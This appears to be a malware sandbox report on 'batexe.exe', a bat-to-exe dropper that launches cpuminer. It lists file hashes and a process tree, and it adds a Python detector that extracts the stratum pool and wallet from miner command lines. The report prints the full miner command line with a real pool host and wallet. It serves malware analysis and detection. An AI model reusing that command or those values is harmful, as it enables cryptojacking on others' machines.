Analysis
-
max time kernel
293s -
max time network
296s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64, arch:x86, image:win10-20231215-ja, locale:ja-jp, os:windows10-1703-x64, system, windows
submitted
14/02/2024, 04:17
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid   Process
32    b2e.exe
1268  cpuminer-sse2.exe
Loads dropped DLL 5 IoCs
pid   Process
1268  cpuminer-sse2.exe
1268  cpuminer-sse2.exe
1268  cpuminer-sse2.exe
1268  cpuminer-sse2.exe
1268  cpuminer-sse2.exe
yara_rule match: upx 1 IoCs
resource                                                                    yara_rule
behavioral1/memory/2580-5-0x0000000000400000-0x000000000393A000-memory.dmp  upx
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description                       pid   Process     procid_target
PID 2580 wrote to memory of 32    2580  batexe.exe  74
PID 2580 wrote to memory of 32    2580  batexe.exe  74
PID 2580 wrote to memory of 32    2580  batexe.exe  74
PID 32 wrote to memory of 5008    32    b2e.exe     75
PID 32 wrote to memory of 5008    32    b2e.exe     75
PID 32 wrote to memory of 5008    32    b2e.exe     75
PID 5008 wrote to memory of 1268  5008  cmd.exe     78
PID 5008 wrote to memory of 1268  5008  cmd.exe     78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  - Suspicious use of WriteProcessMemory
  PID:2580
  C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe (level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:32
    C:\Windows\SysWOW64\cmd.exe (level 3)
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9143.tmp\batchfile.bat" "
      - Suspicious use of WriteProcessMemory
      PID:5008
      C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe (level 4)
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
        - Executes dropped EXE
        - Loads dropped DLL
        PID:1268
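The process tree above is the whole story of this sample: a bat-to-exe wrapper (b2e.exe) unpacks to %TEMP%, cmd.exe runs the embedded batch file, and the batch file launches cpuminer with a hard-coded stratum pool and wallet. The following is an added example, not part of the sandbox report and not Triage's own detection logic: a small Python detector that walks process-creation events, pulls the pool, algorithm and wallet out of miner command lines, and checks whether the miner was reached through a Temp-directory dropper chain. The event records are constructed from the PIDs and command lines shown in the tree above; the ProcEvent structure, the regexes and the scoring rule are this example's own assumptions, not fields of any real telemetry source.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed shape; map Sysmon EID 1 or 4688 onto it)."""
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Constructed sample: PIDs, images and command lines copied from the report's process tree.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(2580, None, r"C:\Users\Admin\AppData\Local\Temp\batexe.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"'),
    ProcEvent(32, 2580, r"C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe" '
              r'C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp '
              r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"'),
    ProcEvent(5008, 32, r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9143.tmp\batchfile.bat" "'),
    ProcEvent(1268, 5008, r"C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe",
              "cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 "
              "--userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3"),
]

# stratum+tcp / stratum+tcps / stratum+ssl pool URLs are the strongest single miner indicator.
STRATUM_RE = re.compile(r"stratum\+(?:tcp|tcps|ssl)://([^\s\"']+)", re.IGNORECASE)
# cpuminer/xmrig-style flags; "--userpass" is listed before "--user" so it wins the alternation.
ALGO_RE = re.compile(r"(?:^|\s)(?:-a|--algo)[=\s]+(\S+)")
USER_RE = re.compile(r"(?:^|\s)(?:--userpass|--user|-u)[=\s]+([^\s:]+)")
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def miner_indicators(cmdline: str) -> Dict[str, str]:
    """Extract pool, algorithm and wallet/user from a miner-looking command line."""
    found: Dict[str, str] = {}
    if m := STRATUM_RE.search(cmdline):
        found["pool"] = m.group(1)
    if m := ALGO_RE.search(cmdline):
        found["algo"] = m.group(1)
    if m := USER_RE.search(cmdline):
        found["wallet"] = m.group(1)   # the part before ":" (password / "c=doge" coin hint)
    return found


def ancestry(events: List[ProcEvent], pid: int) -> List[ProcEvent]:
    """Return the process and its ancestors, child first, as far as the events allow."""
    by_pid = {e.pid: e for e in events}
    chain: List[ProcEvent] = []
    cur = by_pid.get(pid)
    while cur is not None and cur not in chain:   # guard against cyclic / reused PIDs
        chain.append(cur)
        cur = by_pid.get(cur.ppid) if cur.ppid is not None else None
    return chain


def analyze(events: List[ProcEvent]) -> List[dict]:
    """Flag every process with a stratum pool in its command line and describe how it was reached."""
    findings = []
    for e in events:
        ind = miner_indicators(e.cmdline)
        if "pool" not in ind:
            continue
        chain = ancestry(events, e.pid)
        temp_ancestors = [p for p in chain if TEMP_DIR_RE.search(p.image)]
        bat_via_cmd = any(p.image.lower().endswith("cmd.exe") and ".bat" in p.cmdline.lower()
                          for p in chain)
        findings.append({
            "pid": e.pid,
            "image": e.image,
            "pool": ind["pool"],
            "algo": ind.get("algo"),
            "wallet": ind.get("wallet"),
            "chain": [p.pid for p in chain],
            # Heuristic: miner plus a .bat launched by cmd.exe plus at least two Temp-dir
            # executables in the ancestry is the bat-to-exe dropper pattern seen in this report.
            "dropper_chain": bat_via_cmd and len(temp_ancestors) >= 2,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

The pool host and wallet are the two values worth pivoting on: the host goes into DNS and proxy logs to find other hosts talking to the same pool, and the wallet string is what ties separate samples to the same operator. The `-t 3` thread count and the `c=doge` password suffix are cpuminer/zpool conventions and are not used for detection here.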
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
10.0MB
MD5
6a51bb3137fdf37d27ec3c32967f4c74
SHA1
e4f0065b6d6afa306ff8469cb8364fe5313efb2c
SHA256
936355e1aa9f0fd51335946cd316842147045c9cb7ff31c3ac7e1133c58111d5
SHA512
ca40ab86661caa1ef62331b552019b8ac687b98f36c59dd03f861a9ed2c500384357c4dcbae993bc4376bfcc0ed0ad74d0ba8f0530833abf930e0863b623d2bf
-
Filesize
8.0MB
MD5
dca9c934b8e5ef624c66ffdacfe3aacc
SHA1
091e6c0008abb93bdd5e32d3f7429dbd24d2f12e
SHA256
e568891c95b20ee1dd1fb55482c4a2c61313725adb1ad666cc47304a0ad52f71
SHA512
be9eb9228785115d611c53d25da42354ce400461e3e7e9eeac2cd0a417dbff4fa0aff2df138709f6ec8626f8d526302923f89f67fcb06fdd762dfa9ddf05392a
-
Filesize
136B
MD5
8ea7ac72a10251ecfb42ef4a88bd330a
SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD5
4c04147c386ba8792ac6a03069572a8a
SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
836KB
MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
3.4MB
MD5
c8daa1ce8c442f5f5efdfc488389671f
SHA1
eeebea5269f1aa62d89fdfc63fa8623585d9a136
SHA256
7da0bb84a7dbe470cd656f55531336eb3a8c3069974c7183e8e6983e2d947c64
SHA512
af7cb836c3d6610f9bef72b05ea5ef644f89debd961e743bdb5a4d3a273aef1ecb25a5f4fa49343dbc42c46c6bb2445b081aaf2f0d03c93bb9df526ce44741b5
-
Filesize
606KB
MD5
585efec1bc1d4d916a4402c9875dff75
SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
1.2MB
MD5
7cf672bee2afba2dcd0c031ff985958e
SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217
SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
3.6MB
MD5
5e154e1f428d420fe7bd607f1392df54
SHA1
0e8b01587f5ccd8ef811ef56c901bb52e3ed87c1
SHA256
6726b07a172ebd0d780afc0ba87eb06dbdcdd1c1a43e844b49b039fa1edb35d0
SHA512
3a7980433afbb0ed695093761f5e1a1d6d029933aef5581ff3d2bd27017102f55260de8ae87b3f20b785e70c75e6d525a1da9680f5d42adc8f7d8c434db02dd3
-
Filesize
3.4MB
MD5
b2c9a888066f5743c6f2a7b561bb1faa
SHA1
bf31ee86fb739ae62764ce48c478679da8b41076
SHA256
03b52e9ebdb1f54abc9352ba703d6c02dc066a10defa576cf7f346c75ecc412b
SHA512
9ae02eda9e5a02d009e94de1bf6961c95980aa978dd1a1245d95150a34cdaca8d594b5854e6e414c661c74b95c34abf3fa73b3e3daedbe97fc68f68e6309e2dc